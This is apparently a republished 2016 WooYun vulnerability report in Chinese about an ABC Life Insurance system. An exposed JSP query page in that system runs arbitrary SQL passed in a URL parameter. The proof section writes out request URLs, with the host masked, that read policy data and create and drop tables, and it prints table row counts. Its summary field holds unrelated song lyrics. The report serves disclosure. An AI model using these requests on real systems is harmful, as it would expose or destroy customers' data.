农银人寿某系统漏洞可执行SQL读取数据(可瞬间Drop百万数据)

admin
admin
admin
139803
文章
114
评论
2017年4月29日21:28:45评论433 views字数 249阅读0分49秒阅读模式
摘要

2016-04-14: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2016-196048

漏洞标题: 农银人寿某系统漏洞可执行SQL读取数据(可瞬间Drop百万数据)

相关厂商: 农银人寿

漏洞作者: 路人甲

提交时间: 2016-04-14 11:30

公开时间: 2016-06-02 11:30

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 15

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 设计缺陷 JS信息泄露

0人收藏

漏洞详情

披露状态:

2016-04-14: 细节已通知厂商并且等待厂商处理中
2016-04-18: 厂商已经确认,细节仅向厂商公开
2016-04-28: 细节向核心白帽子及相关领域专家公开
2016-05-08: 细节向普通白帽子公开
2016-05-18: 细节向实习白帽子公开
2016-06-02: 细节向公众公开

简要描述:

如果世界漆黑 其实我很美
在爱情里面进退 最多被消费
无关痛痒的是非
又怎么不对 无所谓
如果像你一样 总有人赞美
围绕着我的卑微 也许能消退
其实我并不在意 有很多机会
像巨人一样的无畏
放纵我心里的鬼
可是我不配
丑八怪 能否别把灯打开
我要的爱 出没在漆黑一片的舞台
丑八怪 在这暧昧的时代
我的存在 像意外

详细说明:

code 区域 
http://**.**.**.**/bugs/wooyun-2015-0157676
code 区域 
http://**.**.**.**/bugs/wooyun-2010-0148933

参考以上两个之一即可.

漏洞证明:

问题发生在:

code 区域 
http://**.**.**.**:7060/ui/

农银人寿某系统漏洞可执行SQL读取数据(可瞬间Drop百万数据)

code 区域 
http://**.**.**.**:7060/ui/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=select+TABLE_NAME,NUM_ROWS+from+tabs+where+NUM_ROWS+>+1000000&strStart=1&LargeFlag=0

这里我们就查询当前数据库中行数大于1000000的表名(右键查看源码即可看到返回数据):

农银人寿某系统漏洞可执行SQL读取数据(可瞬间Drop百万数据)

code 区域 
LZCARDDETAILZS|1522354
 LZCARDDETAIL|4819853
 LJAGENTTOPAY|1652969
 LCWSLOG|1661462
 LCINSURED|1770319
 LCCONT|1913788
 LCAPPNT|1750369

这里读取下LCCONT的前100行:

code 区域 
http://**.**.**.**:7060/ui/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=select+*+from+LCCONT+where+rownum+<+100&strStart=1&LargeFlag=0

农银人寿某系统漏洞可执行SQL读取数据(可瞬间Drop百万数据)

之后测试下能否任意操作当前数据库:

1.

code 区域 
http://**.**.**.**:7060/ui/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=create%20table%20wooyun%28id%20number%2811%29%20not%20null%29&strStart=1&LargeFlag=0

2.

code 区域 
http://**.**.**.**:7060/ui/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=insert%20into%20wooyun%28id%29%20values%281%29&strStart=1&LargeFlag=0

3.

code 区域 
http://**.**.**.**:7060/ui/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=select%20*%20from%20wooyun&strStart=1&LargeFlag=0

农银人寿某系统漏洞可执行SQL读取数据(可瞬间Drop百万数据)

4.Drop一下wooyun

code 区域 
http://**.**.**.**:7060/ui/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=drop%20table%20wooyun&strStart=1&LargeFlag=0

5.再执行一下3中的查询

农银人寿某系统漏洞可执行SQL读取数据(可瞬间Drop百万数据)

果然已经不存在了

Js文件以后还是要仔细看看

修复方案:

修复...

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-04-18 11:11

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-14 11:34 | ADVERT ( 实习白帽子 | Rank:87 漏洞数:26 | Stay hungry,stay foolish.)

    1

    写的诗好好哦

  2. 2016-04-14 12:04 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

    1

    drop一下看看

  3. 2016-04-14 12:17 | 冒泡 ( 路人 | Rank:8 漏洞数:3 )

    1

    @ADVERT 这是歌,歌名丑八怪

  4. 2016-04-14 12:17 | 木易 ( 普通白帽子 | Rank:347 漏洞数:70 | 不,,不要误会,我不是针对谁,我是说在座...)

    1

    我会告诉你这是一首歌吗?

  5. 2016-04-14 12:18 | ADVERT ( 实习白帽子 | Rank:87 漏洞数:26 | Stay hungry,stay foolish.)

    1

    哈哈,我和洞主开个玩笑,

  6. 2016-04-15 00:00 | 冒泡 ( 路人 | Rank:8 漏洞数:3 )

    1

    @ADVERT

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin